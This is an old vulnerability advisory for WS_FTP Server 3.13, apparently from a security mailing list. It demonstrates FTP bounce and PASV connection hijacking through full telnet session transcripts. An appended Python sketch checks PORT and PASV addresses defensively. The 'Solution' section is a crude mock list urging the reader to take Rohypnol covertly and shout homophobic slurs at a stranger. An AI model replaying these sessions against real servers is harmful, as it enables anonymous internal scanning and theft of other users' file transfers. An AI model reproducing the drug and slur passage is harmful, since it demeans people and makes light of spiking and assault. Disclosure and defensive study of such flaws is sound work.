IPSwitch, Inc. WS_FTP Server

From: dev-null@no-id.com
Date: Fri Oct 25 2002 - 07:06:34 PDT

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1
    
    
    
    Product:   IPSwitch, Inc. WS_FTP Server
    Versions:  v3.13 (dated 2002.08.07), possibly others.
    Severity:  Medium-Hot
    
    
    Author:    low halo <lowhaloat_private>
    Date:      October 25th, 2002
    Revision:  1.0
    
    
    
    
    { Overview }
    
        WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce
    attack as well as PASV connection hijacking.
    
    
    
    { Impact }
    
        The FTP bounce vulnerability allows a remote attacker to cause the FTP
    server to create a connection to any IP address on any TCP port greater than
    1024.  Thus, the attacker can scan Internet addresses anonymously along with
    any internal addresses that the FTP server has access to.  More information
    on this vulnerability can be found here:
            http://www.cert.org/advisories/CA-1997-27.html.
        The PASV connection hijacking vulnerability allows a remote attacker to
    intercept directory listings and file downloads from other users; file uploads
    may also be spoofed.  No authentication is necessary to execute this attack.
    More information on this vulnerability can be found here:
            http://www.kb.cert.org/vuls/id/2558.
    
    
    
    { Details }
    
        The following session demonstrates the FTP bounce vulnerability.  The
    internal host "192.168.1.20" is listening on port 8080, and "192.168.2.30"
    is dead or not accessible via port 8080:
    
    $ telnet x.ternal.ip.address 21
    Trying x.ternal.ip.address...
    Connected to x.ternal.ip.address.
    Escape character is '^]'.
    220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
    220-Sun Jun 04 00:00:00 1989
    220-27 days remaining on evaluation.
    220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
    USER lowhalo
    331 Password required
    PASS el_ach
    230 user logged in
    PORT 192,168,1,20,31,144
    200 command successful
    LIST
    150 Opening ASCII data connection for directory listing
    226 transfer complete
    PORT 192,168,2,30,31,144
    200 command successful
    LIST
    425 Can't open data connection.
    
    
    This demonstrates the PASV connection hijacking vulnerability:
    
    $ telnet x.x.x.x 21
    Trying x.x.x.x...
    Connected to x.x.x.x.
    Escape character is '^]'.
    220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
    220-Sun Jun 04 00:00:00 1989
    220-27 days remaining on evaluation.
    220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
    USER lowhalo
    331 Password required
    PASS el_ach
    230 user logged in
    PASV
    227 Entering Passive Mode (192,168,1,1,4,23).
    LIST
    150 Opening ASCII data connection for directory listing
    
    
    Next, from another IP address:
    
    $ telnet x.x.x.x 1047
    Trying x.x.x.x...
    Connected to x.x.x.x.
    Escape character is '^]'.
    drwxr-x---  2 lowhalo     System            0 Jan  0 00:00 .
    drwxr-x---  2 lowhalo     System            0 Jan  0 00:00 ..
    -rwxr-x---  1 lowhalo     System         1337 Jan  0 00:00 lh
    Connection closed by foreign host.
    
    
    
    { Solution }
    
        1.)  Mix yourself a Long Island Iced Tea.
        2.)  Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the
              box you bought last time to get yourself out of that chicken-
              suit bind last Wednesday, remember??).
        3.)  While you're not looking, slip yourself two (2) crushed 100mg pills.
        4.)  Drink your Long Island while pretending to be flirting with someone
              in a bar environment (but in fact, you're still in your lonely,
              lonely apartment because you're a fucking loser and you're gonna
              die alone 28 years from now).
        5.)  Put on those crotchless leather pants that you got in your closet.
              But this time, don't wear anything underneath.  Not even
              underwear.
        6.)  Go to the local gay bar, even though you're not gay, and wait
              outside 'till that warm fuzzy roofies feeling starts crawling up
              your back.
        7.)  Go inside the bar and look for the menacing black biker guy named
              Steve (Hey, how did you know his name is Steve if you're not
              gay, huh??).  Take the deepest breath you can and scream at the
              top of your lungs every homosexual slur that you can think of
              right in the guy's face.
        8.)  Wake up 16 hours later at the bottom of a ditch in a pool of your
              own blood with that, "uh-oh, I think I forgot my jacket at the
              bar" feeling.
        9.)  Try to figure out exactly what happened, and LAUGH YOUR ASS OFF
              when you do.
        10.) Die alone 28 years from now, you fucking loser.
    
    
        (Yeah, so anyways, IPSwitch never got back to me after two weeks, so
        there is no solution to this problem.)
    
    
    { Conclusion }
    
        A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!!
    You guys have a lot to be proud of.
    
        And here's a quote I'd like all those iDEFENSE research contributors to
    read:
    
            "Few men have the virtue to withstand the highest bidder."
                - George Washington
    
    
    
    
            low halo <lowhaloat_private>
            Defender of Truth and Liberty
    
            http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
            58CE 3215 226A 69ED 4D20  4044 C925 54F9 9BFD 99BF
    
    
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.0 (GNU/Linux)
    
    iD8DBQE9uF67ySVU+Zv9mb8RAplZAJ0WhQbCfyjFWyNc8hfgIySKqFspBACeLFHb
    8LkuAxTfsHywHMYA7SlCL8M=
    =G5ln
    -----END PGP SIGNATURE-----
    
    
    --
    This message has been sent via an anonymous mail relay at www.no-id.com.
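
The two transcripts in { Details } succeed because the server never compares a data-connection endpoint with the address of the control connection. The sketch below is an added example, not code from the advisory or from IPSwitch: it decodes the `h1,h2,h3,h4,p1,p2` argument and applies the address and port checks that an FTP server needs for PORT and PASV. The function names and the 203.0.113.x / 198.51.100.x client addresses are assumptions constructed for illustration.

```python
import ipaddress
import re

# h1,h2,h3,h4,p1,p2 as carried by PORT and by the 227 (PASV) reply
HOSTPORT_RE = re.compile(r"^\s*(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\s*$")


def parse_hostport(arg):
    """Decode a host-port argument into (IPv4Address, port)."""
    m = HOSTPORT_RE.match(arg)
    if not m:
        raise ValueError("malformed host-port argument")
    n = [int(x) for x in m.groups()]
    if any(v > 255 for v in n):
        raise ValueError("field out of range")
    ip = ipaddress.IPv4Address(".".join(str(v) for v in n[:4]))
    return ip, n[4] * 256 + n[5]


def check_port_command(arg, control_peer_ip):
    """Return (allowed, reason) for a PORT argument (hypothetical server hook).

    Refuses any target that is not the control-connection peer (the bounce
    case) and any port below 1024.
    """
    try:
        ip, port = parse_hostport(arg)
    except ValueError as exc:
        return False, str(exc)
    if ip != ipaddress.IPv4Address(control_peer_ip):
        return False, "PORT address differs from control-connection peer"
    if port < 1024:
        return False, "PORT targets a reserved port"
    return True, "ok"


def check_pasv_accept(data_peer_ip, control_peer_ip):
    """Accept a passive-mode data connection only from the address that
    issued PASV on the control connection (the hijacking case)."""
    return ipaddress.IPv4Address(data_peer_ip) == ipaddress.IPv4Address(control_peer_ip)


if __name__ == "__main__":
    client = "203.0.113.5"  # constructed control-connection peer
    # PORT arguments taken from the transcript in the advisory
    for arg in ("192,168,1,20,31,144", "192,168,2,30,31,144"):
        print(arg, parse_hostport(arg), check_port_command(arg, client))
    # Data connection arriving from a different address than the PASV issuer
    print(check_pasv_accept("198.51.100.9", client))
```

With these checks in place both PORT commands from the first transcript are refused with a 5xx reply before any outbound connection is attempted, and the connection from "another IP address" in the second transcript is dropped before the listing is sent.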
    


